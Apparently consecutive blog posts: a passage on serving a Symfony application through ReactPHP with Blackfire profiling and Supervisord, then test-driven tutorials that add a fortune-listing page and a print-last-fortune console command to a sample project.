We get the following results:
We can also profile the application using Blackfire to discover bottlenecks:
blackfire curl 'http://localhost:1337/app.php/'
killall -9 php
We get the following results:
Let's have a look at the graph:
As expected from an empty application without any logic, we can clearly see that autoloading is the number 1 bottleneck, with the Dependency Injection Container being its main caller (for which the EventDispatcher is the main caller).
Before we continue our benchmarks for the ReactPHP version of our application, we'll need to modify it a bit in order to support Blackfire:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../app/autoload.php';
$kernel = new AppKernel('prod', false);
$callback = function ($request, $response) use ($kernel) {
$method = $request->getMethod();
$headers = $request->getHeaders();
$enableProfiling = isset($headers['X-Blackfire-Query']);
if ($enableProfiling) {
$blackfire = new Blackfire\Client();
$probe = $blackfire->createProbe();
}
$query = $request->getQuery();
$content = $request->getBody();
$post = array();
if (in_array(strtoupper($method), array('POST', 'PUT', 'DELETE', 'PATCH')) &&
isset($headers['Content-Type']) && (0 === strpos($headers['Content-Type'], 'application/x-www-form-urlencoded'))
) {
parse_str($content, $post);
}
$sfRequest = new Symfony\Component\HttpFoundation\Request(
$query,
$post,
array(),
array(), // To get the cookies, we'll need to parse the headers
$request->getFiles(),
array(), // Server is partially filled a few lines below
$content
);
$sfRequest->setMethod($method);
$sfRequest->headers->replace($headers);
$sfRequest->server->set('REQUEST_URI', $request->getPath());
if (isset($headers['Host'])) {
$sfRequest->server->set('SERVER_NAME', explode(':', $headers['Host'])[0]);
}
$sfResponse = $kernel->handle($sfRequest);
$response->writeHead(
$sfResponse->getStatusCode(),
$sfResponse->headers->all()
);
$response->end($sfResponse->getContent());
$kernel->terminate($sfRequest, $sfResponse);
if ($enableProfiling) {
$blackfire->endProbe($probe);
}
};
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
This requires Blackfire's SDK:
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer require -o --update-no-dev --ignore-platform-reqs 'blackfire/php-sdk'
Now let's run the benchmarks:
php bin/react.php&
curl 'http://localhost:1337/'
ab -c 1 -t 10 'http://localhost:1337/'
We get the following results:
Finally we can profile it:
curl -H 'X-Blackfire-Query: enable' 'http://localhost:1337/'
killall -9 php
We get the following results:
Let's have a look at the graph:
This time we can see that most of the time is spent in event listeners, which is expected since that's the only place in our empty application where there's any logic.
There's no denying it, we've made use of our potential to achieve Super Speed: by converting our application into a HTTP server using ReactPHP, we improved our Symfony application's performance by a factor of 8!
After running some silly benchmarks, we've picked ReactPHP as it was seemingly yielding better results:

However since we don't actually make use of the true potential of any of those projects, it's worth mentioning them and their differences:
Not mentioned in the graph, there's also:
Note: To check the benchmarks, have a look at Bench Symfony Standard. Each project has its own branch with the set up used and the benchmarks results.
To understand how turning our application into a HTTP server can improve performance, we have to take a look at how the alternative works. In a regular stack (e.g. "Apache / mod_php" or "nginx / PHP-FPM"), for each HTTP request:
PHP superglobals ($_GET, $_POST, etc.) are created using data from the Request. Amongst the advantages this brings, we can list not having to worry (too much) about:
Killing the PHP process once the Response is sent means that nothing is shared between two Requests (hence the name "shared-nothing" architecture).
One of the biggest disadvantages of such a set up is low performance, because creating a PHP process for each HTTP Request means adding a bootstrapping footprint which includes:
With ReactPHP we keep our application alive between requests, so we only execute this bootstrap once when starting the server: the footprint is absent from Requests.
However now the tables are turned: we're vulnerable to memory consumption, fatal errors, statefulness and code update worries.
So turning our application into a HTTP server means that we have to be mindful developers: we have to make it stateless and we need to restart the server for each update.
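To illustrate the statefulness pitfall, here's a minimal sketch (not from the original article) showing how static state survives between calls within a long-running PHP process, something a shared-nothing setup would never expose:

```php
<?php
// In a shared-nothing setup each request gets a fresh process, so this
// would always print 1. In a long-running server the process survives
// between requests, and the static variable leaks state across them.
function handleRequest(): int
{
    static $requestsServed = 0; // lives as long as the process does

    return ++$requestsServed;
}

echo handleRequest(), "\n"; // first "request": 1
echo handleRequest(), "\n"; // second "request": 2 — it saw the first one
```

Anything like this (static properties, in-memory caches, global registries) has to be hunted down before going long-running.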
Regarding fatal errors and memory consumption, there is a simple strategy we can use to mitigate their impact: automatically restart the server once it stops.
That's usually a feature included in load balancers (for example in PHP-PM, Aerys and appserver.io), but we can also rely on Supervisord.
On Debian based distributions it can easily be installed:
sudo apt-get install -y supervisor
Here's a configuration example (create a *.conf file in /etc/supervisord/conf.d):
[program:bench-sf-standard]
command=php bin/react.php
environment=PORT=55%(process_num)02d
process_name=%(program_name)s-%(process_num)d
numprocs=4
directory=/home/foobar/bench-sf-standard
umask=022
user=foobar
stdout_logfile=/var/log/supervisord/%(program_name)s-%(process_num)d.log ; stdout log path, NONE for none; default AUTO
stderr_logfile=/var/log/supervisord/%(program_name)s-%(process_num)d-error.log ; stderr log path, NONE for none; default AUTO
autostart=true
autorestart=true
startretries=3
It will start 4 processes of our server, each with a PORT environment variable set respectively to 5500, 5501, 5502 and 5503, and automatically restart them if they stop.
Here's a nice resource for it: Monitoring Processes with Supervisord.
While PHP itself doesn't leak memory, our application might. The more memory a PHP application uses, the slower it will get, until it reaches the limit and crashes. As a safeguard, we can:
But a better way would be to actually hunt down memory leaks, for example with PHP meminfo.
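One way to implement the "restart once stopped" safeguard from the worker's side is to exit cleanly once memory crosses a threshold and let Supervisord (with autorestart=true) bring a fresh process back up. A hedged sketch, with an arbitrary 128 MB threshold:

```php
<?php
// Arbitrary threshold, in bytes: tune it to your application's real usage.
const MEMORY_LIMIT = 128 * 1024 * 1024;

function shouldRestart(int $memoryUsage, int $limit = MEMORY_LIMIT): bool
{
    return $memoryUsage >= $limit;
}

// In the ReactPHP request callback, after $response->end(...):
// exit cleanly when the threshold is crossed; Supervisord restarts us.
if (shouldRestart(memory_get_usage(true))) {
    exit(0);
}
```

Exiting between two requests (rather than mid-request) means no client ever sees the restart.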
We also need to know a bit more about the tools we use, such as Doctrine ORM or Monolog, to avoid pitfalls (or use the LongRunning library to clean those automatically for us).
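Concretely, Doctrine ORM's identity map grows with every entity we load, and Monolog's fingers-crossed handler buffers records in memory; both can be cleared between requests. A hedged sketch (it assumes an `$entityManager` and a `$fingersCrossedHandler` are in scope in the request callback; `clear()` is the real method name on both):

```php
// At the end of the ReactPHP request callback, between two requests:
$entityManager->clear();         // Doctrine ORM: detach all managed entities
$fingersCrossedHandler->clear(); // Monolog: drop buffered log records
gc_collect_cycles();             // encourage PHP to reclaim cyclic references
```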
It only takes ~50 lines to turn our application into a HTTP server, ReactPHP is indeed a powerful library.
In fact we haven't even used its main features and still managed to greatly improve performances! But these will be the subject of a different article.
Note: Read-only APIs are a good candidate for such a set up.
In the next blog post, we'll have a look at a different way (not that we can't combine both) to achieve the Super Speed potential of our applications built with HTTP frameworks like Symfony.
In the meantime, here's some resources about turning our applications into HTTP applications:
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we've started to put all this knowledge in practice by creating a "fortune" project with:
In this article, we're going to continue the "fortune" project by creating a command that prints the last fortune.
Note: To start with the same code, use the following repository:
git clone https://github.com/gnugat-examples/fortune.git
cd fortune
composer install -o --ignore-platform-reqs
git checkout web-example
git checkout -b cli-example
The CLI equivalent of a web Controller is a Command. We're first going to create a functional test:
<?php
// tests/AppBundle/Command/PrintLastFortuneCommandTest.php
namespace Tests\AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Tester\ApplicationTester;
class PrintLastFortuneCommandTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$application = new Application($kernel);
$application->setAutoExit(false);
$this->app = new ApplicationTester($application);
}
/**
* @test
*/
public function it_prints_last_fortune()
{
$input = array(
'print-last-fortune',
);
$exitCode = $this->app->run($input);
self::assertSame(0, $exitCode, $this->app->getDisplay());
}
}
Successful commands always return 0 as an exit code, which is what we're going
to check in this test. Let's run the suite:
vendor/bin/phpunit
They fail, telling us to create the actual code for the command:
<?php
// src/AppBundle/Command/PrintLastFortuneCommand.php
namespace AppBundle\Command;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class PrintLastFortuneCommand extends Command
{
protected function configure()
{
$this->setName('print-last-fortune');
}
protected function execute(InputInterface $input, OutputInterface $output)
{
}
}
Since Symfony automatically looks for classes that extend Command in the
Command directory of each registered bundle, our command is now available:
vendor/bin/phpunit
The test suite is now green. We can run it using the console:
bin/console print-last-fortune
We should successfully get an empty line.
In order to get something else than an empty line, we need to create a new use case. Its purpose will be to convey intent (print the last fortune) and to validate the input parameters:
<?php
// tests/AppBundle/Service/PrintLastFortuneTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\PrintLastFortune;
class PrintLastFortuneTest extends \PHPUnit_Framework_TestCase
{
/**
* @test
*/
public function it_has_no_parameters()
{
$printLastFortune = new PrintLastFortune();
}
}
Well, currently we don't have any input parameters. But if we get a new requirement that does need input parameters, we'll be ready to validate them. For now we can run the tests:
vendor/bin/phpunit
They fail because we need to create the actual class:
<?php
// src/AppBundle/Service/PrintLastFortune.php
namespace AppBundle\Service;
class PrintLastFortune
{
}
This should fix the issue:
vendor/bin/phpunit
Now let's create the Handler that will print the last fortune:
<?php
// tests/AppBundle/Service/PrintLastFortuneHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\FindLastFortune;
use AppBundle\Service\PrintLastFortune;
use AppBundle\Service\PrintLastFortuneHandler;
class PrintLastFortuneHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = 'Why do witches burn?';
private $findLastFortune;
private $printLastFortuneHandler;
protected function setUp()
{
$this->findLastFortune = $this->prophesize(FindLastFortune::class);
$this->printLastFortuneHandler = new PrintLastFortuneHandler(
$this->findLastFortune->reveal()
);
}
/**
* @test
*/
public function it_prints_last_fortune()
{
$printLastFortune = new PrintLastFortune();
$lastFortune = array(
'content' => self::CONTENT,
);
$this->findLastFortune->findLast()->willReturn($lastFortune);
self::assertSame($lastFortune, $this->printLastFortuneHandler->handle($printLastFortune));
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create PrintLastFortuneHandler:
<?php
// src/AppBundle/Service/PrintLastFortuneHandler.php
namespace AppBundle\Service;
class PrintLastFortuneHandler
{
private $findLastFortune;
public function __construct(FindLastFortune $findLastFortune)
{
$this->findLastFortune = $findLastFortune;
}
public function handle(PrintLastFortune $printLastFortune)
{
return $this->findLastFortune->findLast();
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create FindLastFortune:
<?php
// src/AppBundle/Service/FindLastFortune.php
namespace AppBundle\Service;
interface FindLastFortune
{
public function findLast();
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section, we've created:

- a PrintLastFortune use case which could be validating input parameters; for now it's empty and only serves to convey intent (use case: print the last fortune)
- a PrintLastFortuneHandler class that calls the services which will do the actual logic
- a FindLastFortune interface, whose implementations will find the last fortune

We're going to use Doctrine DBAL to actually find the last fortune in the database.
This can be done by creating an implementation of FindLastFortune:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalFindLastFortune.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\FindLastFortune;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalFindLastFortune implements FindLastFortune
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function findLast()
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->select('*');
$queryBuilder->from('fortune');
$queryBuilder->orderBy('id', 'DESC');
$queryBuilder->setMaxResults(1);
$sql = $queryBuilder->getSQL();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
return $statement->fetch();
}
}
This was the last class we needed to write. We can now use PrintLastFortune
in our command:
<?php
// src/AppBundle/Command/PrintLastFortuneCommand.php
namespace AppBundle\Command;
use AppBundle\Service\PrintLastFortune;
use AppBundle\Service\PrintLastFortuneHandler;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class PrintLastFortuneCommand extends Command
{
private $printLastFortuneHandler;
public function __construct(PrintLastFortuneHandler $printLastFortuneHandler)
{
$this->printLastFortuneHandler = $printLastFortuneHandler;
parent::__construct();
}
protected function configure()
{
$this->setName('print-last-fortune');
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$printLastFortune = new PrintLastFortune();
$lastFortune = $this->printLastFortuneHandler->handle($printLastFortune);
$output->writeln($lastFortune['content']);
}
}
Note: In the command, we extract Input parameters and options and put them in PrintLastFortune, which is going to validate them. We then simply call PrintLastFortuneHandler to take care of the logic associated to PrintLastFortune.
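If a requirement later adds input parameters, the use case constructor is where that validation would live. A hypothetical sketch (the class name, the count parameter, and the DomainException choice are illustrative, not part of the project):

```php
<?php
// Hypothetical evolution of the use case: print the last N fortunes.
// The constructor validates input so handlers can trust what they receive.
class PrintLastFortunes
{
    public $count;

    public function __construct($count)
    {
        if (!is_int($count) || $count < 1) {
            throw new \DomainException('count must be a positive integer');
        }
        $this->count = $count;
    }
}

$useCase = new PrintLastFortunes(3); // valid input passes through
```

The command would then build this object from `$input->getArgument(...)` and let the exception bubble up as a non-zero exit code.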
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
# Commands
app.print_last_fortune_command:
class: 'AppBundle\Command\PrintLastFortuneCommand'
arguments:
- '@app.print_last_fortune_handler'
tags:
- { name: console.command }
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
- '@twig'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.print_last_fortune_handler:
class: 'AppBundle\Service\PrintLastFortuneHandler'
arguments:
- '@app.find_last_fortune'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.find_last_fortune:
alias: app.bridge.doctrine_dbal_find_last_fortune
app.bridge.doctrine_dbal_find_last_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindLastFortune'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Let's run the tests:
rm -rf var/cache/*
./bin/console doctrine:database:drop --force
./bin/console doctrine:database:create
bin/console doctrine:query:sql 'CREATE TABLE fortune (id SERIAL, content TEXT);'
vendor/bin/phpunit
All green! Let's add some fortunes:
php -S localhost:2501 -t web
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"I am sorry to have kept you waiting, but I am afraid my walk has become rather sillier recently"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Well you cannot expect to wield supreme executive power just because some watery tart threw a sword at you."}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"All right... all right... but apart from better sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health ... what have the Romans ever done for us?"}'
We can now check our command:
bin/console print-last-fortune
This time instead of an empty line, we do get the last fortune.
To create a new command, we need to:

- create a class extending Command in the Command directory of a registered bundle
- register it as a service with the console.command tag

The command's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we've started to put all this knowledge in practice by creating a "fortune" project with an endpoint that allows us to submit new fortunes.
In this article, we're going to continue the "fortune" project by creating a page that lists all fortunes.
In the next article we'll also create for this application a command that prints the last fortune.
Note: To start with the same code, use the following repository:
git clone https://github.com/gnugat-examples/fortune.git
cd fortune
composer install -o --ignore-platform-reqs
git checkout api-example
git checkout -b web-example
We'll first start by writing a functional test for our new endpoint:
<?php
// tests/AppBundle/Controller/FortuneControllerTest.php
namespace Tests\AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
class FortuneControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
}
/**
* @test
*/
public function it_lists_all_fortunes()
{
$request = Request::create('/');
$response = $this->app->handle($request);
self::assertSame(200, $response->getStatusCode(), $response->getContent());
}
}
Just like for our endpoint, we're only interested in checking the status code
of the response (200 is a successful response).
Let's run the tests:
vendor/bin/phpunit
They fail, with a 404 NOT FOUND response. That's because we don't have any
controllers, so let's fix that:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
public function listAll(Request $request)
{
return new Response('', 200);
}
}
After creating a controller, the next step is to configure its route:
# app/config/routing.yml
submit_new_fortunes_endpoint:
path: /api/v1/fortunes
defaults:
_controller: app.api.fortune_controller:submit
methods:
- POST
list_all_fortunes_page:
path: /
defaults:
_controller: app.fortune_controller:listAll
methods:
- GET
In this configuration, _controller is set to call the listAll method of the
app.fortune_controller service. Here's how to define this service:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
# Handlers
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Now let's run our tests again:
rm -rf var/cache/test
vendor/bin/phpunit
Note: Every time the configuration changes, we need to remove the cache.
The test suite is now green. Let's start the server:
rm -rf var/cache/prod
php -S localhost:2501 -t web
We can now visit our page: http://localhost:2501/app.php/
We should successfully get a blank page.
So now we have an empty page. Let's fix it by creating a use case to list all fortunes:
<?php
// tests/AppBundle/Service/ListAllFortunesTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\ListAllFortunes;
class ListAllFortunesTest extends \PHPUnit_Framework_TestCase
{
/**
* @test
*/
public function it_has_no_parameters()
{
$listAllFortunes = new ListAllFortunes();
}
}
We can now run the tests:
vendor/bin/phpunit
They fail because we need to create the actual class:
<?php
// src/AppBundle/Service/ListAllFortunes.php
namespace AppBundle\Service;
class ListAllFortunes
{
}
Note: Currently the use case class has no parameters to validate. If new requirements come up with the need for some parameters, we're going to be able to check them here.
This should fix the issue:
vendor/bin/phpunit
Now let's create the Handler that will list all fortunes:
<?php
// tests/AppBundle/Service/ListAllFortunesHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\FindAllFortunes;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
class ListAllFortunesHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "It's just a flesh wound.";
private $listAllFortunesHandler;
private $findAllFortunes;
protected function setUp()
{
$this->findAllFortunes = $this->prophesize(FindAllFortunes::class);
$this->listAllFortunesHandler = new ListAllFortunesHandler(
$this->findAllFortunes->reveal()
);
}
/**
* @test
*/
public function it_lists_all_fortunes()
{
$listAllFortunes = new ListAllFortunes();
$this->findAllFortunes->findAll()->shouldBeCalled();
$this->listAllFortunesHandler->handle($listAllFortunes);
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create ListAllFortunesHandler:
<?php
// src/AppBundle/Service/ListAllFortunesHandler.php
namespace AppBundle\Service;
class ListAllFortunesHandler
{
private $findAllFortunes;
public function __construct(FindAllFortunes $findAllFortunes)
{
$this->findAllFortunes = $findAllFortunes;
}
public function handle(ListAllFortunes $listAllFortunes)
{
return $this->findAllFortunes->findAll();
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create FindAllFortunes:
<?php
// src/AppBundle/Service/FindAllFortunes.php
namespace AppBundle\Service;
interface FindAllFortunes
{
public function findAll();
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section, we've created:

- a ListAllFortunes use case which could be validating input parameters; for now it's empty and only serves to convey intent (use case: list all fortunes)
- a ListAllFortunesHandler class that calls the services which will do the actual logic
- a FindAllFortunes interface, whose implementations will find all fortunes

We're going to use Doctrine DBAL to actually find all fortunes from a database.
This can be done by creating an implementation of FindAllFortunes:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalFindAllFortunes.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\FindAllFortunes;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalFindAllFortunes implements FindAllFortunes
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function findAll()
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->select('*');
$queryBuilder->from('fortune');
$sql = $queryBuilder->getSQL();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
return $statement->fetchAll();
}
}
This was the last class we needed to write. We can now use ListAllFortunes
in our controller:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
public function __construct(ListAllFortunesHandler $listAllFortunesHandler)
{
$this->listAllFortunesHandler = $listAllFortunesHandler;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
return new Response('', 200);
}
}
Note: In the controller, we extract Request (input) parameters and put them in ListAllFortunes, which is going to validate them. We then simply call ListAllFortunesHandler to take care of the logic associated to ListAllFortunes.
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Let's run the tests:
./bin/console doctrine:database:drop --force
./bin/console doctrine:database:create
bin/console doctrine:query:sql 'CREATE TABLE fortune (content TEXT);'
rm -rf var/cache/test
vendor/bin/phpunit
All green!
If we start the server and check the page, it's going to be blank. That's because in our controller we create a Response with empty content. Let's improve this situation:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
public function __construct(ListAllFortunesHandler $listAllFortunesHandler)
{
$this->listAllFortunesHandler = $listAllFortunesHandler;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
$fortunesHtml = '';
foreach ($fortunes as $fortune) {
$fortunesHtml .= "<li>{$fortune['content']}</li>\n";
}
$html =<<<HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fortunes</title>
</head>
<body>
<ul>
$fortunesHtml
</ul>
</body>
</html>
HTML;
return new Response($html, 200);
}
}
Let's start the server:
rm -rf var/cache/prod
php -S localhost:2501 -t web
In order to see a list of fortunes, we first need to submit some! We can use our endpoint for this purpose:
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"I came here to have an argument!"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Has not got as much spam in it as spam egg sausage and spam, has it?"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"The Castle of aaarrrrggh"}'
We can now visit our page: http://localhost:2501/app.php/
While it seems a bit plain (a bit of CSS, JavaScript and more HTML wouldn't be too much), we do see a list of all fortunes.
Controllers shouldn't contain any "view" logic; let's push it into a template using Twig:
{# app/Resources/views/list-all-fortunes.html.twig #}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fortunes</title>
</head>
<body>
<ul>
{% for fortune in fortunes %}
<li>{{ fortune.content }}</li>
{% endfor %}
</ul>
</body>
</html>
We now need to use Twig in the controller:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
private $twig;
public function __construct(
ListAllFortunesHandler $listAllFortunesHandler,
\Twig_Environment $twig
) {
$this->listAllFortunesHandler = $listAllFortunesHandler;
$this->twig = $twig;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
$html = $this->twig->render('::list-all-fortunes.html.twig', array(
'fortunes' => $fortunes,
));
return new Response($html, 200);
}
}
Note: The first argument of render is the "path" to the view. This path contains 3 parts, separated by colons (:):

- the first part is the bundle name (by default it's AppBundle, so we don't need to provide it)
- the second one is the directory from Resources/views (in our case it's at the root, so we don't need to provide it)
- the third one is the template file name

Some other path example: FortuneBundle:Fortunes/List:all.html.twig, etc.

The second argument is an array which associates Twig variable names to their values; in our case we're going to have access to a fortunes variable in our template, which is going to contain the content of the $fortunes variable from our controller.
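To see the second argument of render() in isolation, here's a minimal sketch using Twig's array loader (it assumes twig/twig ~1.x is installed via Composer, matching the \Twig_Environment class used in the controller; the inline template is illustrative):

```php
<?php
require __DIR__.'/vendor/autoload.php';

// Render a template held in memory: the 'fortunes' key of the second
// argument of render() becomes the `fortunes` variable in the template.
$twig = new \Twig_Environment(new \Twig_Loader_Array([
    'fortunes.html.twig' => '{% for fortune in fortunes %}<li>{{ fortune.content }}</li>{% endfor %}',
]));

echo $twig->render('fortunes.html.twig', [
    'fortunes' => [['content' => 'I came here to have an argument!']],
]);
```

Inside the template, `fortune.content` transparently reads the `content` key of each array element.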
In order to get Twig injected in our controller, we'll update its service configuration:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
- '@twig'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
